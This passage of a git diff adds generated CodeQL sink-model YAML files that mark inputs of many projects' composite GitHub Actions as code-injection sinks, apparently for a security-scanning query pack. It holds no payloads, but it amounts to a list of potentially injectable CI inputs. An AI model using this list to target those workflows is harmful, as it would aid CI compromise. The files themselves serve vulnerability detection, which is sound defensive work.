"code-injection", "generated"] + - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml new file mode 100644 index 000000000000..d93b946f3d74 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml new file mode 100644 index 000000000000..40adbe1fc29b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml new file mode 100644 index 000000000000..293d8a832bd4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml new file mode 100644 index 000000000000..c72000641cec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml new file mode 100644 index 000000000000..53929ab8ed1a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml new file mode 100644 index 000000000000..1330f370747e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml new file mode 100644 index 000000000000..d9d9c6770bc0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml new file mode 100644 index 000000000000..faf1d7ed5c53 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml new file mode 100644 index 000000000000..12ae92c149b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml new file mode 100644 index 000000000000..610016200174 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml new file mode 100644 index 000000000000..1d30610cfd12 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml new file mode 100644 index 000000000000..867dc33f4321 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml new file mode 100644 index 000000000000..87b014cbdd62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml new file mode 100644 index 000000000000..6dd3ac94306a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml new file mode 100644 index 000000000000..f952bd1da93c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml new file mode 100644 index 000000000000..977662bfa655 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..4c6c92fdefda --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml new file mode 100644 index 000000000000..45c2c1d780a9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml new file mode 100644 index 000000000000..1edfbfc94328 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml new file mode 100644 index 000000000000..658283336bd7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml new file mode 100644 index 000000000000..d00b30874cce --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml new file mode 100644 index 000000000000..94ece1a58a0e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml new file mode 100644 index 000000000000..46d5a4383f44 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..5627a31bd904 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..98d2d8bcbf7f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml new file mode 100644 index 000000000000..57fb2e710642 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml new file mode 100644 index 000000000000..8a216b97e1e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml new file mode 100644 index 000000000000..735413808ec8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml new file mode 100644 index 000000000000..54334359d0e9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml new file mode 100644 index 000000000000..67826ea9c0f8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml new file mode 100644 index 000000000000..d05404147023 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml new file mode 100644 index 000000000000..9020a979bbb0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml new file mode 100644 index 000000000000..91c84fda1d18 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml new file mode 100644 index 000000000000..5031ff1e4ca5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..fc3a7ebe253b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml new file mode 100644 index 000000000000..b7a664d512f3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml new file mode 100644 index 000000000000..234f13b73871 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml new file mode 100644 index 000000000000..164ba02c42bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml new file mode 100644 index 000000000000..17fb61eeeb1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel 